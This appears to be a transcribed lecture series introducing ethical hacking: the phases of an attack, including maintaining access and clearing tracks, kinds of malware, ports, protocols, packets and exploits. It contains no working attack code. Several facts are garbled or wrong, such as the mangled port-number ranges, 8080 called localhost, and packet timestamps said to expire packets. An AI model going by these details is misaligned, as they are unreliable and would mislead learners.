the next phase is maintaining the attacks. So how long he or she have to maintain the access of a target in order to perform the attacks, right? Maintain access. So once the attacker gains the control, automatically how long the control will be safe. That means how long attacker gains access for future exploitation. So more number of attacks can be applied on that particular machine, right? So how long, the attacker or a hacker maintains access until completes his or her activities. So whatever the activities the attacker want to do, so the hacker should maintain the access of a target until completes his or her activities. So for that purpose, the attacker will create some backdoor. So once a backdoor was created, so whenever it is required, the hacker gains the access through the backdoor, right? So that's the maintaining the access. And finally, the last one, clearing tracks. This is very important. Clearing tracks. That means vanishing all the evidences. So how the attacker gains the access? So the attacker should remove all the complete evidences so that anyone should not be detected, right? The hacker should not be get detected. So here attacker clears all his activities, all his or her activities, not to be get detected, right? So how the attacker will clear? So here attacker clears logs which are maintained, and similarly applications. If any applications are installed, those applications will be removed, and if any data is inserted, that data will be removed, right, etc. So whatever the activity is done by the attacker, all the things will be cleared. Okay, so that will be deleted, right? Cleared means deleted, so that no one can find how the attacker enters into the system, right? So for that purpose, the last one is clearing tracks. So this is the last phase of hacking. This is the last phase of hacking. So first one, the recon phase, scanning, gaining access, maintaining, and the clearing tracks. And the last phase comes for the ethical hacker, right? So this is the 5 phases of hacking, and the last phase will be only for ethical hackers. The last phase is only for the ethical hackers. So what is the last phase? Reports. So this is only for ethical hacking. So what will be done here? So ethical hacker, we have discussed in the earlier sessions, like ethical hacker means the person who will be recruited by the organization to find the vulnerabilities of a software or a system or a network. That means gaining the unauthorized access with the permission of an organizational head. So once the complete work is done, okay, the ethical hacker will also follow the same tools which the hacker follows, right? And the ethical hacker will follow the same path and the same way how the hacker gained the access, right? So finally, the ethical hacker, if it is a ethical hacking, the ethical hacker should give the complete report how the process has been done to the organizational head, so that the organization will find out the vulnerabilities and they will prevent they will develop some patches to overcome these vulnerabilities, right? So report with a complete process need to be submitted. So here the complete process means how the vulnerabilities, what are the vulnerabilities, what are the weakness, what are the ports which are not being used, and what are the exploits attacker use, what are the payloads used, what are the different types of attacks the hacker uses, and how the hacker gained the access, so how the hacker created the backdoor, so everything, so what are the tools they have used to gather the information, so everything should be recorded, and the complete report will be submitted to the organization. So that will be the last phase of ethical hacking, right? So this is the last phase which will be used only for the ethical hacking. So 5 phases for hacking and 6 phases for ethical hacking. Today's session will discuss about one more topic in ethical hacking, that is malicious software. And this malicious software is also known as malware. So what exactly do this malware? So this will interrupt our system operations or data or network. So that means it will deviate from its normal operation. Okay, so that we call it as a malware or malicious software. So the hacker will use this malware or a malicious software to exploit the target system. So to identify the target system, the vulnerabilities of the target system, so the attacker will use these type of malicious softwares or malwares. So it's also a program, okay, it's also a program, so which will disturb the normal operation of a system. Right, now we'll see what are the different types of softwares and how these malicious software will enter into our system. So unless the software enters into our system, the hacker can't gain the access. Right, so how these malwares will enter into the system. We'll see the different types of malwares or malicious softwares. So first comes under virus. So I think all of you are aware about this one, the computer virus. So the computer virus will replicate itself and spread in the system That means it will create its own files and that will be spread in the complete system. It will be affected in the another files. So if one file is affected with a virus, automatically that file will corrupt the remaining files. So that means by replicating itself. So no one involves in this, right? So if one virus file enters into our system, automatically it will replicate itself and it will be spread in the system. So how these viruses will be entering into our system? So the files, as we said that, through files, so that may be a Word file, Excel file, etc. or exe files. So whatever it may be, the file, whatever the file extension it may be, through the files the virus will enter into our system. Once it was there in our system, automatically it will replicate itself. So that is the one malicious software. And the second one, worms. So worms are also a type of malicious software, but this worms uses network to spread in the system, to spread into system or to enter into system, right? So with the help of a network, the worms will enter into our system. So how these worms will be entered? So one, by using emails, right? So email means sending a message in a network, right? So in terms of emails, the data, the worms will be entering into the system. So you can say through emails, worms enter into system. So if two systems are connected in a network, if one system is having this worm, automatically that will be generated towards second system. It will be redirected to the second system. So only one medium to replicate these worms is network. Through network, the worms will be spread. And the third one, so this is another type of malicious software. Trojan horse. Trojan horse. And this Trojan horse is also a type of malicious software. And this is, it looks like legitimate software. It looks like a legitimate software and unnoticeable by user. So user can't notice this one. Okay, so unnoticeable by user and runs in the background. So we can't identify. Runs in the background. Right? We can't identify this one. So how this Trojan horse enters into our system? So as I said, this legitimate software. So through utility software, see the second point, this one. Utility software or attachments. So by means of these two things, the Trojan horse will enter into our system. So it will look like a legitimate software. So it will run in the background and unnoticeable by the user because it runs in the background. So we can't notice them. So there is a third type of malicious software. Next, the next type, ransomware. Ransomware. So this is most dangerous. Most dangerous, and it locks all the files and folders using some encryption algorithm. And attacker demands money to provide decryption tool. So until you get this decryption tool, you can't get the data back, right? So the attacker demands the money to provide the decryption tool. So unless all the files will be locked with some encryption algorithm. So this is very dangerous. And how it will enter into our system? So this type of malware will enter through phishing sites. So phishing means replicating the website and treating that website as a legitimate website, so that the user will just click on that website and he or she will give the data, personal data or financial data, so that that complete data will be sent to the attacker. So that's called a phishing sites. So this malicious software, that means a ransomware, will spread or will enter into the system through the phishing sites. Links in the phishing sites. Okay. Links in the phishing sites, right? Next, spyware. So spyware, the name itself indicates, it will spy all the activities done on the system. It will spy all the activities being done on system and sends to attacker. Sends to the attacker, right? So this type of malicious software, we call it as a spyware. Spyware, right? Next, adware. So here this will spread through advertisements. Advertisements or browser extensions. So through these one, this adware will affect our system, right? Through the advertisements, mainly through the advertisements. So that's why we call it as a adware. Adware. So this is also one type of malicious software. And then next one, rootkit. Rootkit, the name itself indicates it will give root privileges. Root privileges. So what are these root privileges? So these root privileges are similar to admin privileges. So in order to install any tools in our system, we require some admin privileges. So only the admin can install the system, right? Install the tools. So that privilege is given to the this one in this rootkit. Okay, similar to admin privileges, and it resides, and this rootkit resides deep in the kernel. Deep in the kernel, that means a lower level. So very difficult to identify. Very difficult to identify. So the only one solution if the system affects with the rootkit is reinstallation of OS. Reinstallation of operating system is the only solution sometimes. Is the only solution sometimes. So this is very difficult malicious software, that is a rootkit. And then the next one is keylogger. Keylogger. So here also the name itself indicates, so it will record all the keystrokes done on the system and it will be sent to the attacker. So it will record all the keystrokes. So keystrokes means whatever the keys we are pressing on the keyboard, everything will be recorded. That means one log will be maintained and the log will be directly given to the attacker. So record all the keystrokes done on the system and the log will be given to the attacker. So whatever the keystrokes we are doing in our keyboard, everything will be recorded. That means simply the login credentials or some personal information or some financial information sometimes. So nowadays we are using the internet for everything, right? So automatically sometimes we may give some personal information, we may give some financial information. So all those keystrokes will be recorded and that will be directly given to the attacker. So like login credentials or personal or financial information. This will be given to the attacker. Second point. Right? So this is the one type of malware or malicious software. Next. Next one. Browser hijacker. Browser hijacker. So the name itself indicates they'll get access of the browser. Okay, the attacker gets an access on browser. So obviously changes the settings of a browser. Changes the settings of browser, and they'll promote their own web page or their own fake pages on the browser. So such type is, we call it as a browser hijacker. That means the complete control of the browser will be in the hands of attacker. So this will be done through the web extensions, browser extensions. Right? Next. Botnet. And this botnet is a network with infected computers. This botnet will be, it's a network with infected computers, and here each system in the network, we call them as a bot. Each bot will act as zombie to spread through other systems. So that we call it as a botnet. So botnet is also one malicious software. Right? So hope you understood this one. See, these are the malicious softwares that the attacker may use these to gain the access of a system. Okay, so all these softwares will gain the access and will disturb the normal operation of a system. They will disturb the normal operation of a system. And in order to prevent this one, the only one solution we are using is, one is antivirus and one is a firewall. So firewall will detect will prevent from the malicious software, and antivirus will detect the malicious files or software which are available in the system. So these two are very important, firewalls and antivirus. Right? So malicious softwares, I'll write once again and I will close this thing. So these are the malicious softwares, or these are also known as malwares. So first one, so what is the first one? Virus. Second one, worms. Third one, Trojan horse. Next, ransomware, spyware, adware, rootkit, keylogger, browser hijacker, botnets. So all these are the malicious software or malicious malwares. So all these will disturb the normal operation of a system. So in today's session we'll discuss about one more important topic in ethical hacking, that is the ports, understanding the ports in a computer. So this is a very important concept in ethical hacking, because the hackers will use these ports to enter into the target machine, right? So what is this port? So port is acting as an interface between two computers or devices. Okay, it will be acting as an interface. So simply through this interface, so the data will be transferred. Okay, so the data will be transferred. See, example, these ports are divided into physical ports and logical ports. So physical ports. So here, coming to the physical ports, so those ports will be existed, and the data will be transferred through these physical ports. Okay, so example for this physical ports are USB port, HDMI port, VGA port, parallel port, right? All these are the physical ports. So through these physical devices, so the port will be acting as an interface, right? So logical port means a logical connection. So this is a physical connection. So in both the cases, the data will be transferred, right? So here it is a logical connection. So there will be no physical connection, there will be a logical connection from one computer to another computer. So the data can be transferred either using the physical ports or logical ports. For example, if you connect the monitor to the CPU, the data will be transferred through that particular physical port, the VGA port. Through the VGA port, the data will be transferred from the CPU to monitor. Similarly, logical connection, through the logical connection, the data will be transferred from one system to another system, right? So here, in order to get the data into our computer, that can be done with the help of either physical ports or logical ports. So the hackers will use these logical ports. Okay, so our system is having around 65,536 ports. So in that many ports, the data can be entered into our system. So these are categorized into three types. One is a well-known ports. So where the port, so every port will be having some numerical number. Okay, every port, this particularly logical port, right? Every logical port will be having numerical number, right? So like that, around 65,536 ports are available. So among that, first one is a well-known ports, which are numbered from 0 to 1023. All these are the well-known ports which are reserved for some purpose. So for some data transfer between two different systems. So reserved ports, these are also called as a reserved ports. Next, registered ports. So these are meant for personal web server applications. Okay, and these are numbered from 10242 to 49,151. So if the port number is in between these range, in this range, that we can call it as a registered port. That will be used by personal. Okay, the vendors for a personal web servers, they'll use these registered ports. And the third one is private ports, private or dynamic ports. Dynamic ports. So all the remaining, that means the numbers from 149,152 to 65,536, all the ports will come under this private ports. So these are the well-known ports which are reserved for a few purposes, and the hackers will mainly use these ports. So some well-known ports are, so I think you understood this physical port. I am erasing this one. So all we know about these physical ports. So now we have to learn about these logical ports. So it's also a logical connection, right? So coming to some well-known ports. Well-known ports are, if it is a 20, port number 20 and 21, that is used for file transfer protocol. That will be used for a FTP protocol, right? File transfer protocol. In order to exchange the files between a system and system, that will be done through these port numbers 20 or 21. And port number 23 is a telnet. Telnet, just like our intranet. Okay, so if the data is exchanged in the intranet, then we can use this 23. The port assigned will be 23. So these are the reserved ports. Okay, so we can't change this one. So if you are using the FTP, automatically the port number will be either 20 or 21. If you are using some telnet, the port number will be 23. That means the data will be entered through this particular port number 23. And coming to the 53, that is for DNS, domain name service. Domain name service. And coming to the 80. So we know the 8080 is a local host. That means HTTP, web services. For all the web services, the port number will be 80. So we are doing the HTTP request like 8080 port numbers, right? And coming to the 443, I think that comes with the HTTPS, secure protocol, secure HTTP. Right? So these are the few well-known ports. That means all are registered for this particular purpose. Okay, all are registered for a particular purpose. Right? So yes. So these are the ports, the logical ports, and in the logical ports, the three types of ports. So the hacker will mainly focus on these ports which are being used and which are being unused, and they will gain the access of a system through this port. So if a hacker wants to hack our system, so what will be done? Some sort of malware will be sent to the victim system, so that in the victim system, once a malware is injected, so that malware will be replicated itself and it will be spread all over the system as well as the network. So how the malware is injected, so that will be done through these ports. So in order to know what are the used ports and what are the unused ports and all the details of a port informations, so use a command called netstat. Netstat is a command to know the information about the ports, network statistics. Right? So if you use, so this you have to use in a command prompt. Right? So if you use a netstat -a, it will give the all information about all the receiving ports. Right? So this is about the ports. Hope you understood what is a port and what is the importance of port. A port is used to transfer the data. That can be physically or logically. Right? So we all know about this physical ports because we are using some internet, we are using the system desktop. So we are connecting the monitors, we are connecting the printers, we are connecting the pen drives, flash drives, etc, etc. So everything will be connected through the physical ports itself. But there will be some logical ports, because if you are using some client server architecture, so the client will be sending a request to the web server, and from the web server we are getting the response. That means, so if you are typing some google.com in your computer, so that will be redirected to the web server, Google server, and from that Google server the login page will be loaded into your system, right? That we call it as a response. So what happens here, some sort of data is transferring from your system to server and server to your system. So that will be done with the help of these ports. So there we are not using any physical port, right? So there we are using some logical port. So that may be with the help of 8080 or a 443. right, the port numbers. So here the logical ports will be of numerical, and all totally there are around 65,536 ports available, among that well-known, registered and private and dynamic ports. So hope you understood about this ports concept. So once you try this command in the command prompt and share your experience in the comment box. So in today's session, we'll discuss about one more topic which will be used in both the networking and the ethical hacking, that is the protocols. So we'll be using these protocols in the networking, but in this session we'll see what exactly these protocols, what is the importance of these protocols, and what will we do with these protocols, right? And these protocols are defined as a set of rules established for formatting or processing the data. So coming to the network, if a group of computers are connected to a network, so some sort of data will be transferred, right? And some sort of resources will be shared among the different systems. And all these networking functions will be processed smoothly with the help of these protocols, right? So protocols are a set of rules that are established to process data. For example, so data sharing, that means one computer can share the data with another computer. So both the networks may be different or same. That means two computers, that means the two devices which shares the data may be of a same network or different networks. So each computer will be using their own softwares and their own hardwares, even though the data will be processed efficiently. That is done with the help of these protocols. So the different protocols will be used for different processes. There are a lot of protocols. For each process, the different protocol will be used. Now we'll see what are the different types of protocols and where exactly these protocols will be used. How the data, which kind of data will be exchanged, which kind of data will be communicated or processed, right? So coming to the first one, ARP, so which stands for Address Resolution Protocol, and this, the name itself indicates, it gives the address mapping, okay, in the network. So how can one system shares the information with the another, how one system communicates with the another? So with the help of some IP address and the MAC address. So the IP address and MAC address, right? So this identifies the network and this identifies the system. So this sort of mapping of IP address with the MAC address will be done with the help of this address resolution protocol, and this ARP will maintain a table with all the MAC addresses, right? So it maps the IP address and the corresponding MAC address so that the packets will be transferred to that particular network, right? And this mapping is the responsible of this particular address resolution protocol, right? Second one, SLIP, stands for Serial Line Internet Protocol. So this serial line internet protocol, so we have discussed in the computer networks that the data will be transferred with the help of a packets in the form of packets, right? So the grouping of characters to form a packet will be done by this serial line protocol. So the group of characters, a sequence of characters will be forming a packet. To form a packet will be done with the help of this serial line protocol. Okay, serial line internet protocol. Next, IP version 4. It's nothing but internet protocol. Internet protocol. So this we will use this one. I think many of you were aware about this internet protocol. So how the packets means the data which we are communicating, right? So the packets or the data should be communicated from one system to another system. So that should be routed. Okay, so that should be routed. So the complete routing of a packet to the destination from source will be done by this internet protocol, right? So here it will be done a routing. A routing will be done. So here packet forming, and here mapping IP to MAC, right? So routing will be done with the help of this internet protocol, and this is version 4. Okay, and the next one is IP version 6. That's the latest version. So updated of version 4. So what is this updation? What is this updation? The IP length will be increased from 32-bit to 128-bit, so that more number of addressing will be done, and the data will be routed efficiently than IP version 4. That was the updation, right? So more number of addressing will be done because the IP length will be increased from 32-bit to 128-bit, right? And in order to routing the packets, this IP protocol, I mean internet protocol, will be done, and with the help of another protocol called TCP, the data packets will be delivered to the destination address. So that's why we call them as a TCP IP. So the combination of both these protocols, transmission control and the internet protocol, the data or the packets will be routed to the destination, right? Next, ICMP, Internet Control Message Protocol. See, this will be used by the network devices which will give the error messages. So during the transmission, if there is any errors or any congestion, that sort of information will be communicated with the help of this ICMP. So network devices will send error messages or any congestions, right? So whatever the thing, so that will be communicated with the help of this internet control message protocol. Internet control message protocol. Next, TCP, Transmission Control Protocol. So here the name itself indicates transmission, the packets. So this is responsible for transmitting the packets from source to destination, and with the combination of internet protocol, the packets will be routed to the destination, right? So with the help of acknowledgement, so the error checking will be done here. The error checking will be done, and if there are any errors and if the packets are not delivered at the destination, so this TCP will retransmit the data, retransmit the packet to the destination. So also the TCP retransmits retransmits the lost packets. So in our previous session we have discussed about these packets, right? So in that we have seen there will be some sort of disturbance, and due to that disturbance some sort of packets will be lost. So lost means the packets were not delivered at the destination. So in such case, this TCP is responsible to find the acknowledgement and to find the error, and it is feasible to retransmit the lost packets. So whatever the packets lost, that will be retransmitted with the TCP protocol, and with the combination of TCP IP, the packets will be delivered to the destination. And this is also called as a connection oriented protocol. Connection oriented. So before before transmitting the packets, there should be a connection between the client, the two devices. Okay, so which we want to communicate. So the data should first, the connection should be established, and once the connection is established, then the packets will be transferred from source to destination. So that's why we call it as a connection oriented protocol. TCP is also called as a connection oriented protocol, transmission control protocol. And the next one, UDP, is called a user datagram protocol. And similar to this TCP, so this is a connectionless protocol. And this is also used to transmit the packets from source to destination, but no reliability. There is no reliability, okay, and no error checking. Obviously, no retransmission of data. So data or a packets, right? So this is just to send the packets from source to destination. So it doesn't observe or doesn't have any error checking that whether the packets have been received at the destination or not. So that's why there is no concept of retransmission of lost packets, right? So this is no reliability. There is no reliability when compared to the TCP. And the next one, RPC, remote procedure call, and this is used to communicate between the remote device. Okay, one system can communicate with the another device. Okay, so connect with the another remote device. Okay, this is used to connect with another device. And the next one, so DHCP, dynamic host configuration protocol. And here the name itself indicates this is used to distribute the IP addresses among the systems over a network. So if any one of the system is included in the network, then assignment or assigning a new IP address to the newly added system will be done with the help of this protocol called dynamic host configuration protocol. So this is responsible for distributing IP addresses to newly added system in network. So many systems will be added, keep on adding the systems to a network, right? So if one system is added to a network, then some new IP address should be assigned, and that will be done with the help of this DHCP, Dynamic Host Control Configuration Protocol. Next, DNS, Domain Name System Protocol. So we know that, so if you are observing some client server, so the client will send the request and the server will give the response. One example is just accessing a website. So for example, if you want to communicate or if you want to search anything in the Google, so the first step we are doing is opening the browser, and in the address bar we are typing just www.google.com. So immediately the request will be sent to the server, and the server will give the response by loading the home page in our client, that means in our system. But here a system, the server will also be identified with the help of IP address only, but we are just communicating with the help of URL, right? So in order to remember all the IP address, that is difficult, so we are just making it easier by remembering the URLs, that means the host names. So whenever you just type the URL like google.com, the first step happens is that google.com will be converted to the numerical IP address, corresponding numerical IP address, and automatically the packets will be sent to that particular IP address. Okay, so in our networking, two systems will be communicated only through the IP address, the numerical IP address. So but here we are just giving the host name, that means URL. So that will be first converted into IP address, and to that particular IP address the data packets will be transferred. So that will be done with the help of this DNS, Domain Name System. So conversion of URL to IP address, that's a Domain Name System Protocol. Domain Name System Protocol, right? The next, FTP, which is a File Transfer Protocol, and this, the name itself indicates, in order to transfer the files, that means a file sharing, will use this file transfer protocol. So this will be for file sharing between the host or device or computer, whatever it may be. So in order to share the files, okay, this FTP protocol, that means a file transfer protocol, will be used. And the next, HTTP stands for Hypertext Transfer Protocol. So Hypertext Transfer Protocol is used to communicate between the client and server. So just we have seen, right? So just we have explained about this one, DNS, right? So if you want to access any group, any web server, so we need to access with the help of URL, so that the URL will be converted into IP address, and this communication will be done with the help of this HTTP. So you can observe, if you just give google.com in the address bar, automatically it will start with this HTTP or HTTPS. So this Hypertext Transfer Protocol, this is used to connect client with server. So you can imagine the client as a browser, server as a web server, right? And this is also known as request and response protocol, because the client sends the request and server gives the response. So that's why we call it as request response protocol. So this is used to connect or sending data in World Wide Web. www is the World Wide Web. right? So for that we are using this hypertext transfer protocol. And there's a one more variation in this HTTP, that is a HTTPS. That's nothing but secure. So the data which we are sending in the World Wide Web, that means a communication what is going to be done between client and server, that will be in the encryption format. So that means the data will be giving security. So that we call it as a HTTPS. So this also we will see, we will observe in the web browser if you are communicating with any other website, any website, not only the Google. If you go with any website, you can observe this one, right? For example, going to the Google, it will come like this, HTTPS : / so like this we will get, right? So that means some sort of data is we are communicating to the World Wide Web. Okay, so that is a HTTP and HTTPS. Next, IMAP, which is a Internet Message Access Protocol. Internet Message Access Protocol, and this is an email protocol. So all of us are using the email service, right? So this is a one email protocol, one of the email protocol, and this is used to access or manipulate emails, the emails, right? So this is used to retrieve emails from mail server, right? So the Google will be having some mail server, similarly Yahoo will be having some mail server, right? So like that there will be different mail servers. From that mail servers, in order to retrieve these emails, we'll use this Internet Message Access Protocol. So this is one type of email protocol. And the next one, see, these are all different types of protocols which are being used for different kinds of processes, right? POP. This is called as a post office protocol. This is also an email protocol, another email protocol. So this will also be used in a mailing purpose, and here it will enable user to download the emails from mail server to client, so that next time if the client wants to read the emails, it need not be in the internet connection, right? So offline mode, we can read the emails in the offline mode. So it enables the user to download the emails from the mail server to the client, email client, right? So for that we are going to use this. This protocol will be used, post office protocol. This is also another email protocol, two email protocols, IMAP and POP. Next, SMTP, simple mail transfer protocol, and this is also one more email protocol. This is also another email protocol, and this protocol is used to transfer the emails from one user to another. So this is used to transfer emails from one user to another. So here the previous two protocols, that means IMAP and POP, are used to retrieve the protocols, but this SMTP is used to send the protocols. Okay, so here you can see IMAP and POP, they are used to retrieve emails from the email server, and whereas SMTP is used to transfer email, retrieving and transfer, right? So these are the three different email protocols. And the next one, telnet, and this telnet is used to communicate or connect the remote devices. So with one device with another device with the help of some IP address or host name. So this telnet enables the admin to connect with any remote device with IP or host name. So mainly this will be used to share the data from one system to another system, right? So with the help of IP address or the host name, the two systems can be connected, two different remote devices can be connected, and once there is a connection, automatically the data can be transferred, right? Next, the next one, SNMP stands for Simple Network Managing Protocol, and this will also be used by the admins. So it enables the admin to monitor the network performance. So in order to monitor the network performance or managing the nodes, so whatever the nodes that are available, nodes is nothing but a device, right? So managing the nodes also, this protocol will be used. SNMP, Simple Network Managing Protocol, Simple Network Managing Protocol, right? So these are the different protocols that are used in networking to process the data. So in all these protocols you can observe some sort of data is processing, right? So without the protocols, the networking functions will not be possible, right? So any function, anything, if you want to work with the network, then obviously there should be a protocol, right? So hope you understood. So that's why we say the protocol as a rules that are established to process the data in the network. In today's session, we'll discuss about one more topic, that is understanding about the packets in networking. So coming to the networking, so the data will be transferred between two different devices. So that means the data will be transferred in terms of packets. So in this session, we'll see what exactly these packets and what will be available in the packets, right? So packets, so very important concept in networking, right? And this will be also be used in ethical hacking also, right? So if you consider two systems which are connected in a network, so this is system and this is another system. So let it be system A and system B. So there are two different systems and we are supposed to exchange the data between A and B. So let it be, this is the bandwidth. So the data will be transferred from A to B through the bandwidth. And for example, if A wants to send the data which is more than the available bandwidth, then what happens? So here the data will be divided into a small parts called a packets, right? So for example, some some 100 bytes of data is to be transferred from A to B, and the bandwidth is only 50 bytes. Okay, the bandwidth is only 50 bytes. So it's somewhat difficult to send 100 bytes at a time. So what happens here? So this will be divided into different smaller parts. So let it be, I am giving a small example. So let it be 4 parts. Okay, 25 bytes, 25 bytes, 25 bytes and 25 bytes. So these small parts, these small units of data is known as packet. So that the transfer will be fast and it will be reliable, right? Instead of sending the complete information at a time, so it will be very easy and efficient if you divide the complete data into smaller units. So that means in terms of packets, right? So packet means a small unit of data, Now let it be, so this is one packet, this is one, this is one and this is one. So total 4 packets are available now. So each packet size is 25. So what exactly will be in the packet? So this packet represents 2 things. One is header and the second one payload. So payload is actual data. Okay, whatever the bytes we are using, that will be the payload. Okay, the actual data which we want to transfer from A to B is called a payload. Coming to the header, so the packet should be transferred from A to B, right? So that means this packet should have the destination address. So unless you have the destination address, the packet can't be transmitted, right? So if you want to send an email, so what we need, the recipient email ID should be there. So without the recipient email ID, you can't send a message. So if you want to send a post, so there should be some postal address, the recipient postal address. Similarly, there should be the destination address, so that the packet will be transmitted from source to destination. So both the things will be included in this header, right? So one thing is source address from where the packet has been transmitted, and the destination address. So here the address means identification of that particular device. So we can call it as an IP address, source IP and the destination IP. So in between there will be different routers which will route the packet to the destination, towards the destination, right? So that in order to route the packet, we will apply some routing algorithms. So already we have discussed about some of the routing algorithms in our computer networks playlist. So I'll post that one in the description section. You can go through that one. So the packet will be having the header and payload. In the header, we will be having the source address, destination address. And one more important thing is the length of the data. So whether the data has been modified in the transmission or not. So we have to check. So that will be added here. Length. The length of data will also be included in the header, right? So I'll write this payload once again. The 3 things. And the 4th one, the timestamp, the time when the payload has been created, when the packet has been created, right? So timestamp. So the packet will be valid only up to that particular time, right? So up to that particular time, the packet will be valid. So if the time exceeds, automatically the packet will be destroyed. It will not be used. Okay. So within that particular time, the destination should receive this particular packet. So if it receives the packet where the time has been exceeded, automatically that implies that packet has been destroyed, right? So timestamp is important. So within that particular time period, the packet should be received. And next very important thing is sequence number, identity, or we can call it as a sequence number. So what is the use of this sequence number? So here we have divided the complete data into 4 packets, right? So these 4 packets will be sent here. These 4 packets will be sent to here, right? So imagine these 4 packets as a 4 different vehicles. Okay, 4 different cars or 4 different bikes. So this is a bandwidth, it's nothing but a road. Okay, it's nothing but a road. So at a time 2 packets can be traveled here, or 3 packets can be traveled based upon the bandwidth. So here we have given some 50. So at a time 2 packets can be traveled at a time, right? So we don't know which packet receives, which packet will reach the destination first. Okay, for example, this is 2, this is 1, this is 4, and this is the 3. Maybe the 3rd packet has been received first, next 4th packet has been received second, and 1st packet has been received third, and 2nd packet has been received last. Okay, so we don't know the order. So what happens, the destination, yes, the destination have received all the 4 packets, but the destination should reassemble the data. Okay, reassemble the packets. So which comes first, which comes next, and which comes the third, and which comes the fourth, like that. So in order to reassemble the data at the destination, for every packet there will be a sequence number. So according to that sequence number, the destination will rearrange the packets. Okay, so even though the packets received in this order, so for example 3rd, 4th, 1 and 2, so this will be reassembled as 1, 2, 3 and 4. So for the reassembling of data, the sequence number will be used. So that is most important. And also, so sometimes due to some congestion, network congestion, or some failures, the packets may be lost. Okay, the packets may be lost. So if the packet is lost, for example, if the packet 1 is lost, okay, the 1 has not reached the destination. The 1 has not reached the destination. So we are having only 3 packets at the destination. So what happens here? So there should be one acknowledgement from B to A, such that we have received so and so packets. So based upon that acknowledgement, if A doesn't receive any acknowledgement from B, that implies that the corresponding packet has not been reached to the destination. So in such cases, the B expects the retransmission of the packet, and that retransmission of the packet will be taken care by the protocols. So the protocol will make sure that all the packets has been received by the destination. If any one of the packet has been lost, automatically the retransmission will be initiated. So the packets will be retransmitted to the destination, right? So this is how packets can be transmitted from source to destination. So apart from this, there are 7 more fields. Okay, there are 7 more fields. Okay, also there will be checksum, header checksum. This is called a header checksum. If any one of the data has been lost, automatically based upon this checksum, the correction will be done. Okay, checksum, okay, length, and a lot of information will be there. So these are the major things. I have covered only the major things that are included in the packet header. Okay, and the second part is payload. Payload means actual data, and there is also a third part, which is a trailer. Okay, header and a trailer. Trailer consists of a checksum, so which corrects the data if any modification is there. Okay, so that will not be available for the TCP/IP protocols. So the majorly packet will be having only 2 parts, that is a header, packet header, and the payload, right? So this is how the packets will be transferred from A to B. So every packet will be having the sequence numbers, so in order to reassemble or reassign at the destination, right? If any one of the packet has been lost during the transmission, the protocol will initiate the retransmission of that particular packet, and if any packet is received by the destination beyond the timestamp, okay, so automatically then also it will expect the retransmission of the same packet. Okay, so the packet loss will be due to some network damage or any network congestions, okay, network traffic, etc., etc. There will be many reasons why the packets has been lost, right? So this is the overview of the packet. So this is most important. So if your system is connected to a network, so here the data transmission will be done with the help of a packets itself. So what is the data transmission? For example, let us be, this is a client. Just for an example, I am saying this is a server. Let it be, this is a Google server. Google server. So if a client gives some www.google.com, automatically some sort of data, so data means this URL or anything else, right? So whatever the request we are sending from the client, that we call as a data, that will be sent to Google server, okay, as a request, and server will give a response to the client by loading this Google home page to the client. Okay, so immediately if you are giving www.google.com, we are getting the home page. So that actually that home page will be available in the Google server. So once you send the request, the Google server will load the home page into the client system based upon the IP address, right? So some sort of data will be communicated from the client to a server. So that data will be transmitted with the help of this packet in the form of packets, right? So hope you understood this packets information. So what is a packet and how these packets will be transmitted from A to B, that means two different devices, right? So this will also be useful in our ethical hacking, right? So there is a tool called Wireshark, so which will be acting as a packet sniffer, packet analyzer, how the packets or what are the packets transmitted from source to destination. So I'll explain that tool in our further sessions. So there you can see all these things. So what is a packet, what is the sequence number of the packet, what is the timestamp, what is the length of the packet, what is the source address, what is the destination address, everything you can find in that particular tool, Wireshark. Okay, and this is a one popular tool that will be used by the ethical hackers. In today's session, we'll discuss about one more topic in ethical hacking, that is exploit. What is meant by exploit? First we'll see what is an exploit, and then we'll see what are the different types of exploits, right? So for example, consider if there is any system or any network, any software or any hardware. So usually the work of an hacker is to gain the access of either system, network, software, hardware or data, right? And that will be done through the weakness of these particular aspects, right? So for example, if there is any weakness upon system or network or software or hardware, so that will be taken as an advantage by the hacker, and the hacker will gain the access of either system, network, software and hardware, and this process is called as an exploit. So taking an advantage to gain the access through the vulnerabilities is called exploit. So process of taking advantage of a vulnerability to gain access is called exploit. It's called an exploit. So once there is a vulnerability, there might be a chance of getting the access, right? And see, here the question is whether this exploit is a malicious code. Then the answer is exactly no. So exploit is not a malicious code. So exploit is not malicious, right? But it will make the hacker to send the malware to the system. Okay, so exploit helps the hacker to send malicious code to system or target machine or hardware or software, whatever it may be, right? So this is an exploit, and this is exactly a point which is not an malicious. And also exploit is also a piece of code. So how this exploit is means, exploit is a piece of code, but it is not a malicious, right? But it is not a malicious. So it will take an advantage of vulnerabilities. So this exploit can be used in either positive way or a negative way. So a little bit confused. So how this can be taken as a positive and how it can be taken as a negative. So obviously, coming to the positive, how we can take it as a positive. So if you find the vulnerabilities, if any hacker exploits, that means if any hacker takes an advantage of vulnerabilities, automatically the software companies, the organization will provide some patches to cover these vulnerabilities. So in a positive way, in order to find the vulnerabilities and in order to find the patches, we can use these exploits. So whether there are any weakness and whether the hacker can hack the system or hacker can gain the access of the system. So that can be identified by using this exploit. Right? I think it's clear now. Now, this exploit is categorized into two categories. Okay, one is known exploits, another one is unknown exploits. See, coming to the known exploits. So obviously, if any software was released, a newly released, automatically it will be having some sort of vulnerabilities, right? So I will write the types. So one we call it as a known exploit. So this known exploit, the name itself indicates, so these exploits are identified by the company, okay, by recruiting the cyber researchers. Okay, so they'll identify the exploits, they will identify the vulnerabilities, and automatically they will create some patches to cover these exploits. So those exploits are known as known exploits, right? So these exploits are identified and developed patches to cover vulnerabilities. That means if any exploitation is done, that implies there is some sort of vulnerability, right? So if you identify the exploitation done, automatically the company or organization will develop some patches to cover those vulnerabilities, so the access can't be taken by the hacker itself. So those exploits are known as known exploit. That means these exploits are identified and developed patches. Already the patches are available for these known exploits. And the second one, unknown exploits. Usually the hackers will use these unknown exploits to gain the access of a system, right? And so these are identified by the organization and develops the patches to cover the vulnerabilities. Now coming to this one, these exploits are identified by hackers prior to
